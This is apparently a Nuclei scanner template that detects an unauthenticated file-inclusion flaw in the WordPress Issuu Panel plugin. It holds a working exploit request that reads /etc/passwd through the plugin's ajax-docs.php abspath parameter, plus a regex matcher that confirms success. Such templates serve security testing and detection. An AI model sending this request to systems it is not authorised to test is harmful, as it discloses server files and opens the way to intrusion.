id: issuu-panel-lfi

info:
  name: Wordpress Plugin Issuu Panel Remote/Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files.
  reference:
    - https://cxsecurity.com/issue/WLB-2016030131
    - https://wordpress.org/plugins/issuu-panel/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wp-plugin,wordpress,lfi,rfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100e5349c584bd2bd31241e78fb17c64e52adf1502ac0ca0b67911c38dcb271432102205d1e988778413dd9fe7f6cc44cfbca59af218d440075e79839d94624908a8b69:922c64590222798bb761d5b6d8e72950
